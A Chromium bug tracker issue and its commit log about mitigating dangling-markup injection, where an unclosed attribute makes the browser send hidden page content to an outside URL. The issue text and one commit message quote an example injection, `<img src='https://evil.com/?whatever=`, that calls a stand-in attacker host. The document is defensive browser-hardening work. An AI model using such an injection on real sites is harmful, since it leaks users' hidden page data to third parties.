Issue 680970 `<img src='` eats the page until the next `'`.
Starred by 7 users Project Member Reported by mkwst@chromium.org, Jan 13
Status: Assigned
Owner:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 3
Type: Bug

Blocking:
issue 680969
issue 695474



Because HTML is fairly lax in parsing attribute values, injecting something like `<img src='https://evil.com/?whatever=` can expose otherwise hidden values by eating up elements and their attributes, and resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href` attributes to bring them in line with CSS's rules for `url('`. That is, perhaps we should stop resolving URLs that contain newline characters? Or braces? Or both? It's not clear whether we can do something about this by default, but worst case, we could allow an opt-in to stricter parsing.

Metrics first, then a proposal to HTML folks.
 
(Unescaped newlines or braces, that is. Something like `%0A` is fine, whereas `\n` is indicative of a dangling `'`)
Project Member Comment 2 by bugdroid1@chromium.org, Jan 14
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/63ec3598c662f32715148c25faf99771c9d1cb6c

commit 63ec3598c662f32715148c25faf99771c9d1cb6c
Author: mkwst <mkwst@chromium.org>
Date: Sat Jan 14 06:12:45 2017

Measure URL resolution with raw newlines and braces.

Because HTML is fairly lax in parsing attribute values, injecting
something like `<img src='https://evil.com/?whatever=` can expose
otherwise hidden values by eating up elements and their attributes, and
resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href`
attributes to bring them in-line with CSS's rules for `url('`. That
is, perhaps we should stop resolving URLs that contain raw newline
characters (`\n`)? Or braces (`<`)? Or both? It's not clear whether we
can do something about this by default, so let's add metrics and see
what we see.

BUG=680970
R=jochen@chromium.org

Review-Url: https://codereview.chromium.org/2629393002
Cr-Commit-Position: refs/heads/master@{#443793}

[modify] https://crrev.com/63ec3598c662f32715148c25faf99771c9d1cb6c/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/63ec3598c662f32715148c25faf99771c9d1cb6c/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/63ec3598c662f32715148c25faf99771c9d1cb6c/tools/metrics/histograms/histograms.xml

Newlines (ignoring leading/trailing only) in src/href in httparchive:

SELECT * FROM (
SELECT page, url, REGEXP_EXTRACT(LOWER(body), r'(<[a-z][^>]+\s+(?:src|href)\s*=\s*(?:"\s*(?:[^"\s]+\s*(?:\r|\n)+\s*[^"\s]+)+\s*"|\'\s*(?:[^\'\s]+\s*(?:\r|\n)+\s*[^\'\s]+)+\s*\')[^>]+>)') AS match
FROM [httparchive:har.2017_01_01_chrome_requests_bodies]
)
WHERE page = url
AND match != "null"
AND NOT REGEXP_MATCH(match, r'["\']\s*\+') # exclude JS string concats


1771 results. https://gist.github.com/zcorpan/aef7b5628010c988b0fa505e9f4ca468

Of those, 26 also have a <. https://gist.github.com/zcorpan/d3a143d7267f441eed3bedea4424f594

(Didn't query for only <.)
Wow. That's a regex. Thank you! :)

Visually inspecting the `\n` + `<` results at https://gist.github.com/zcorpan/d3a143d7267f441eed3bedea4424f594 is encouraging. There's a good deal of commented-out code that's caught up in the regex. http://www.nikonisti.ro/ looks like a typo that wouldn't work in the status-quo either, as does http://www.receive-smsonline.com/ and http://www.cyclenews.com/.

Let's see what the use counter looks like. The current patch up at https://codereview.chromium.org/2634893003 should give us a reasonable estimate of how often we'd actually end up blocking a resource load because of both a raw newline and less-than. I'm hopeful that it's not a large number. :)
Project Member Comment 5 by bugdroid1@chromium.org, Jan 17
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/cd87dfc6f638a6d64b2311d35a58cb1969116915

commit cd87dfc6f638a6d64b2311d35a58cb1969116915
Author: mkwst <mkwst@chromium.org>
Date: Tue Jan 17 13:42:25 2017

Experiment with blocking resolution of HTTP URLs containing '\n' and '<'.

Following up on the metrics added in https://codereview.chromium.org/2629393002,
this patch adds a flag that will prevent URL resolution if the URL string
contains a raw newline and less than sign. It also refines the metrics by
excluding non-HTTP (e.g. `data:`, `javascript:`, `file:`) URLs, as those are quite
likely to contain `<`, and quite unlikely to result in exfiltration (as they don't
hit the network).

Let's see how the data looks.

Intent to Implement: https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ

BUG=680970

Review-Url: https://codereview.chromium.org/2634893003
Cr-Commit-Position: refs/heads/master@{#444040}

[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/resources/helper.js
[add] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/third_party/WebKit/Source/platform/RuntimeEnabledFeatures.in
[modify] https://crrev.com/cd87dfc6f638a6d64b2311d35a58cb1969116915/tools/metrics/histograms/histograms.xml

I noticed now the [^>]+ should have been [^>]*, but for `img` at least it shouldn't make any difference most of the time...
Project Member Comment 7 by bugdroid1@chromium.org, Jan 19
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/41318f4888c1f60613c74cc86e539d173b16b0ad

commit 41318f4888c1f60613c74cc86e539d173b16b0ad
Author: mkwst <mkwst@chromium.org>
Date: Thu Jan 19 15:11:50 2017

Reduce the perf overhead of our dangling markup experiments.

Given that Document::completeURL is a hotspot, this patch revamps the
approach to capture removed whitespace up in //url (where we're already
scanning through the string), and limits the scan for '<' to cases in
which we've actually removed whitespace.

BUG=680970, 682300
R=jochen@chromium.org

Review-Url: https://codereview.chromium.org/2643613002
Cr-Commit-Position: refs/heads/master@{#444734}

[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/platform/weborigin/KURL.h
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/third_party/WebKit/Source/platform/weborigin/KURLTest.cpp
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/tools/metrics/histograms/histograms.xml
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/url/third_party/mozilla/url_parse.cc
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/url/third_party/mozilla/url_parse.h
[modify] https://crrev.com/41318f4888c1f60613c74cc86e539d173b16b0ad/url/url_util.cc

Blocking: 695474
Project Member Comment 9 by bugdroid1@chromium.org, Apr 7
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/58eb768aa18cf83d0ac4b30d339ee1a778ee582a

commit 58eb768aa18cf83d0ac4b30d339ee1a778ee582a
Author: mkwst <mkwst@chromium.org>
Date: Fri Apr 07 18:29:09 2017

Experimentally block/deprecate resource requests whose URLs contain raw newlines.

Intent to Deprecate: https://groups.google.com/a/chromium.org/d/msg/blink-dev/AqSrOMzwrlk/wUglQnTJCgAJ

BUG=680970

Review-Url: https://codereview.chromium.org/2794303002
Cr-Commit-Position: refs/heads/master@{#462933}

[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/bindings/blink-in-js-asan-crash-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/compositing/iframes/iframe-in-composited-layer-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/editing/pasteboard/dragstart-contains-default-content-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-canvas-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-image-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/css/counters/counter-traverse-table-cell-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-body-quirk-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-html-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/constructors/track-event-constructor-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/drag-and-drop-autoscroll-inner-frame-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/resize-subframe-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/events/touch/gesture/long-press-focuses-frame-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/files/null-origin-string-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/frames/content-opacity-1-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/frames/negative-remaining-length-crash-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/loader/simultaneous-reloads-assert-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/loader/stateobjects/pushstate-in-data-url-denied-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-zero-size-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-nested-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-focusable-content-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-scrollable-content-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-recursive-offset-parent-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-with-offscreen-focusable-element-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/fullscreen/full-screen-iframe-without-allow-attribute-allowed-from-parent-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/local/absolute-url-strip-whitespace-expected.txt
[add] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/document-all-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/no-indexeddb-from-sandbox-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-top-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-can-navigate-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-control-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-when-allowed-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/sandboxed-opener-can-close-window-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/window-named-proto-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/security/window-named-valueOf-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/access-control-basic-allow-access-control-origin-header-data-url-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/newline-in-request-uri-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/android/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/fast/text/selection-hard-linebreak-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/linux/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/mac/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/win/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/win/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/platform/win/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/plugins/createScriptableObject-before-start-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/printing/subframes-percentage-height-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/svg/custom/g-outside-svg-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/LayoutTests/svg/custom/large-image-pattern-crash-expected.txt
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/frame/Deprecation.cpp
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/core/loader/FrameFetchContext.cpp
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/third_party/WebKit/Source/platform/RuntimeEnabledFeatures.json5
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/tools/metrics/histograms/histograms.xml
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/url/gurl_unittest.cc
[modify] https://crrev.com/58eb768aa18cf83d0ac4b30d339ee1a778ee582a/url/third_party/mozilla/url_parse.cc

Project Member Comment 10 by bugdroid1@chromium.org, May 18
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/c9d6c1bb4234256176f66cc8c61c9878c931950a

commit c9d6c1bb4234256176f66cc8c61c9878c931950a
Author: mkwst <mkwst@chromium.org>
Date: Thu May 18 15:05:22 2017

Set 'whitespace_removed' correctly when resolving relative URLs.

The previous two (!!!) patches missed the relative URL resolution path
through KURL and url_utils. This patch pokes at the logic one more time.

BUG=680970

Review-Url: https://codereview.chromium.org/2890143002
Cr-Commit-Position: refs/heads/master@{#472812}

[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/third_party/WebKit/LayoutTests/fast/loader/url-strip-cr-lf-tab-expected.txt
[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/third_party/WebKit/Source/platform/weborigin/KURLTest.cpp
[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/url/url_canon_relative.cc
[modify] https://crrev.com/c9d6c1bb4234256176f66cc8c61c9878c931950a/url/url_util_unittest.cc

Project Member Comment 11 by bugdroid1@chromium.org, May 24
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/9e5ae901660de47ef1b844c6113eae91b5ae8e9e

commit 9e5ae901660de47ef1b844c6113eae91b5ae8e9e
Author: Mike West <mkwst@google.com>
Date: Wed May 24 17:43:18 2017

Update dangling markup mitigations.

Still behind a flag, just updating the checks to look for both `\n` and
`<` rather than just the former. This is in line with the patches up at
https://github.com/whatwg/url/pull/284 and
https://github.com/whatwg/fetch/pull/519.

Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ.

Bug: 680970
Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840
Reviewed-on: https://chromium-review.googlesource.com/514024
Commit-Queue: Mike West <mkwst@chromium.org>
Reviewed-by: Jochen Eisinger <jochen@chromium.org>
Cr-Commit-Position: refs/heads/master@{#474341}
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/FlagExpectations/enable-blink-features=LayoutNG
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/bindings/blink-in-js-asan-crash-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/compositing/iframes/iframe-in-composited-layer-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/editing/pasteboard/dragstart-contains-default-content-expected.txt
[add] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/external/wpt/fetch/dangling-markup-mitigation.tentative.html
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-canvas-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/canvas/canvas-composite-image-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/css/counters/counter-traverse-table-cell-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-body-quirk-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/dom/Element/offsetLeft-offsetTop-html-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/constructors/track-event-constructor-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/drag-and-drop-autoscroll-inner-frame-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/resize-subframe-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/events/touch/gesture/long-press-focuses-frame-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/files/null-origin-string-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/frames/content-opacity-1-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/frames/negative-remaining-length-crash-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/loader/simultaneous-reloads-assert-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/loader/stateobjects/pushstate-in-data-url-denied-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/loader/url-strip-cr-lf-tab-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-hidden-iframe-zero-size-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-nested-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-focusable-content-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-no-scrollable-content-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-recursive-offset-parent-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fast/spatial-navigation/snav-iframe-with-offscreen-focusable-element-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/fullscreen/full-screen-iframe-without-allow-attribute-allowed-from-parent-expected.txt
[delete] https://crrev.com/373106c8b302f73d26b4e971b4c0fe1d3fdeeb41/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute-expected.txt
[delete] https://crrev.com/373106c8b302f73d26b4e971b4c0fe1d3fdeeb41/third_party/WebKit/LayoutTests/http/tests/security/dangling-markup/src-attribute.html
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/document-all-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/no-indexeddb-from-sandbox-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/no-popup-from-sandbox-top-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-can-navigate-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-control-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-is-sandboxed-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/popup-allowed-by-sandbox-when-allowed-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/sandboxed-opener-can-close-window-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/window-named-proto-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/security/window-named-valueOf-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/access-control-basic-allow-access-control-origin-header-data-url-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/http/tests/xmlhttprequest/newline-in-request-uri-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/linux/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/linux/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/linux/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/mac/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/win/fast/frames/frameset-style-recalc-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/win/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/platform/win/virtual/disable-spinvalidation/paint/invalidation/canvas-composite-repaint-by-all-imagesource-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/plugins/createScriptableObject-before-start-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/printing/subframes-percentage-height-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/svg/custom/g-outside-svg-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/LayoutTests/svg/custom/large-image-pattern-crash-expected.txt
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/dom/Document.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/frame/UseCounter.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/loader/BaseFetchContext.cpp
